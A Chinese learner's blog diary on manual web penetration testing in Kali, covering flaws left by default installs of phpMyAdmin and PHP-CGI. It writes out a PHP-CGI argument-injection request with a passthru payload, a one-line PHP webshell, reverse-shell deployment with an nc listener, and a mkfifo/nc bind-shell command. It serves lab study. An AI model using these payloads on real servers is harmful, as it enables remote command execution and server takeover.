小白日记35:kali渗透测试之Web渗透-手动漏洞挖掘(一)-默认安装引发的漏洞

手动漏洞挖掘

即扫描后,如何对发现的漏洞告警进行验证。

#默认安装

流传linux操作系统比windows系统安全的说法,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行。

漏洞类型--远程命令执行

1、phpMyadmin

安装在web服务器中的web接口,专门用来管理MySQL数据库。对于早期版本,安装后若是没有做安全配置,对敏感路径进行删除,则有可能留下安全隐患,其中最明显的为setup。

a.探索PHP网站(可根据banner等信息判断)的phpmyadmin目录是否可以访问(扫描工具/手动爬网)

###有账号密码限制,可尝试爆破###

b.尝试../phpMyAdmin/setup目录是否可以访问【可以不需要身份认证的情况下,对服务器进行配置】

###安全最佳实践角度:不允许从公网访问phpMyAdmin目录或禁用访问setup目录

c.早期的phpmyadmin有漏洞【可通过在URL地址编辑或者定制发送的指令,使其执行一个PHP页面】

例如:

POST http://192.168.20.10/phpMyAdmin/?-d+allow_url_include%3d1+-d
+auto_prepend_file%3dphp://input HTTP/1.1                           #修改服务器中的php.ini文件
Host: 192.168.20.10
<?php 
passthru(‘id‘);
die();                                              #后面的指令不执行,可屏蔽服务器返回的html代码等杂信息
?>

#编辑一条配置指令来修改php.ini文件,可编写任何功能的PHP页面【可调用系统功能,passthru()】

#可能运行web服务器进程的用户账号会被限制为www-data之类的普通用户账号,则需经过提权,才能完全控制服务器

Burpsuite重放

#已获得www-data用户权限,可进行ls、cat等操作【pwd:查看当前路径;cat etc/password:查看用户账号】

#搜索PHP文件中是否用硬编码的账号密码

#尝试写入网页木马,控制服务器

注:此漏洞有可能不被扫描器扫出来,可自己手工验证

 

d.网页木马

kali军火库中可以找到现成的网页木马

静态木马webshell,通过浏览器去访问

例如:echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" > /var/www/3.php【最简单的木马】

“\”防止在上传过程中,变量被过滤

在浏览器中执行命令【注:无法直接访问3.php目录,需加问号再执行】

反弹shell【提交一个请求(包含一个反弹shell)】

#账号一般还是会是普通用户【kali中有各种类型的shell】

[email protected]:/usr/share/webshells# ls
asp  aspx  cfm  jsp  perl  php
[email protected]:/usr/share/webshells# cd php
[email protected]:/usr/share/webshells/php# ls
findsock.c        php-findsock-shell.php  qsd-php-backdoor.php
php-backdoor.php  php-reverse-shell.php   simple-backdoor.php
[email protected]:/usr/share/webshells/php# cp php-reverse-shell.php /root/3.php
[email protected]:/usr/share/webshells/php#

#修改shell中反弹连接的IP

#使用nc侦听反弹端口1234【nc终端无法使用tab键】

#将shell代码复制粘贴进POST,go发送【此方法相对隐蔽,不易发现】

############################################################################

当一些命令如ifconfig无法使用时

#################################################################################

2、CGI模块【Ubuntu / Debian 默认安装PHP5-CGI】

#可直接访问/cgi-bin/php5和/cgi-bin/php(这两个目录大部分无法爬取)#因为其不在/var/www目录下

#定制编码shellcode

#使服务器打开一个端口,然后再使用nc去连接获得shell

<?php

echo system(‘mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe‘);

?>

#若有防火墙,需确定防火墙允许通过

时间: 2024-10-19 06:31:15

小白日记35:kali渗透测试之Web渗透-手动漏洞挖掘(一)-默认安装引发的漏洞的相关文章

小白日记28:kali渗透测试之Web渗透-扫描工具-Nikto

扫描工具-Nikto #WEB渗透 靶机:metasploitable 靶场:DVWA[默认账号/密码:admin/password] #新手先将DVWA的安全性,调到最低,可容易发现漏洞 侦察[减少与目标系统交互] Httrack:将WEB可下载的页面下载到本机,再进行本地检查[kali下安装] ##可到此网站获取代理:hidemyass.com[免费代理需小心] 扫描工具-Nikto #基于WEB的扫描工具,基本都支持两种扫描模式.代理截断模式,主动扫描模式 手动扫描:作为用户操作发现页面存

小白日记30:kali渗透测试之Web渗透-扫描工具-Skipfish

WEB渗透-skipfish Skipfish是一个命令行模式,以C语言编写的积极的Web应用程序的安全性侦察工具,没有代理模式. 它准备了一个互动为目标的网站的站点地图进行一个递归爬网和基于字典的探头. 优点:速度比较快[多路单线程,全异步网络I/O,消除内存管理和调度开销,支持启发式自动内容识别],误报相对低 使用方式:[https://my.oschina.net/u/995648/blog/114321] 基本命令使用方式 skipfish -o test http:1.1.1.1  

小白日记37:kali渗透测试之Web渗透-手动漏洞挖掘(三)-目录遍历、文件包含

手动漏洞挖掘 漏洞类型 #Directory traversal 目录遍历[本台机器操作系统上文件进行读取] 使用者可以通过浏览器/URL地址或者参数变量内容,可以读取web根目录[默认为:/var/www/]之外的其他操作系统文件(如:/etc/passwd/).形成根源:目录权限限制不严格 #File include文件包含[1.include本地文件包含LFI:2.远程系统文件包含RFI(可传入木马)] 通常为如include函数,可以将web根目录以外的目录包含进来.根源:include

小白日记32:kali渗透测试之Web渗透-扫描工具-QWASP_ZAP

扫描工具-QWASP_ZAP 十大安全工具之一,集成性工具,功能完善,而且强大.既可做主动扫描,也可做截断代理.开源免费跨平台,简单易用,体验相对混乱,但在主动扫描方面,相对占优.[kali集成] ####建议选择第二项 ####注意检查更新 更新与插件安装 安装插件release和beta[release:成熟版  beta:测试版  alpha:不成熟版] 截断代理[结合手动爬网] 默认情况下,代理功能自启动 1.启动浏览器代理 2. 2.主动扫描 一.快速爬网扫描 二.直接扫描爬到的内容

小白日记29:kali渗透测试之Web渗透-扫描工具-Vega

WEB扫描工具-Vega 纯图形化界面,Java编写的开源web扫描器.两种工作模式:扫描模式和代理模式[主流扫描功能].用于爬站.处理表单,注入测试等.支持SSL:http://vega/ca.crt 专注于应用程序代码方面的漏洞 Vega #基于字典发现网站目录 代理模式 被动收集信息,结合手动爬站[即页面中能点击的链接全部点击一遍,能提交数据的地方,全部提交一遍] #连接到网站外面的链接可以暂时不用管 #设置外部代理服务器 #删除user-agent尾部的vega字样 #设置代理 1.se

小白日记36:kali渗透测试之Web渗透-手动漏洞挖掘(二)-突破身份认证,操作系统任意命令执行漏洞

手动漏洞挖掘 ###################################################################################### 手动漏洞挖掘原则[会比自动扫描器发现的漏洞要多,要全面] 1.每一个变量都进行尝试 2.所有头[如:cookie中的变量] 3.逐个变量删除 #####################################################################################

小白日记51:kali渗透测试之Web渗透-WebShell(中国菜刀、WeBaCoo、Weevely)

webshell 本质:<?php echo shell_exec($_GET['cmd']);?> windows平台 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强 [但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/] 1.利用上传漏洞,先上传一句话木马[支持三种服务器端PHP.ASP.ASP.NET] 使用ssh连接metasploitable 创建包含木马代码的文件 2.连接相应的服务器端 添加服务器端URL [密码为一

小白日记54:kali渗透测试之Web渗透-补充概念(AJAX,WEB Service)

补充概念 AJAX(异步javascript和XML) Asynchronous javascript and xml 是一个概念,而非一种新的编程语言,是一组现有技术的组合 通过客户端脚本动态更新页面部分内容,而非整个页面 降低带宽使用,提高速度 提升用户体验 后台异步访问 AJAX组件 Javascript:AJAX的核心组件,使用XMLHTTPRequest对象接口向服务器发起请求,接受并处理服务器响应数据 Dynamic HTML (DHTML) 早于AJAX出现,通过javascrip

小白日记50:kali渗透测试之Web渗透-CSRF

CSRF CSRF原理:经常与XSS混淆. 从信任的角度进行区分:XSS:利用用户对站点的信任:CSRF:利用站点对已经身份认证的信任(有一定的信任)[默认情况:站点不信任客户端] 结合社工在身份认证会话过程中实现攻击 场景: 1.修改账号密码.个人信息(email.收货地址) 2.发送伪造的业务请求(网银.购物.投票) 3.关注他人社交账号.推送博文 4.在用户非自愿.不知情情况下提交请求 属于业务逻辑漏洞(所有请求都是正常的请求) 对关键操作(支付.提交订单等)缺少确认机制(如验证码) 自动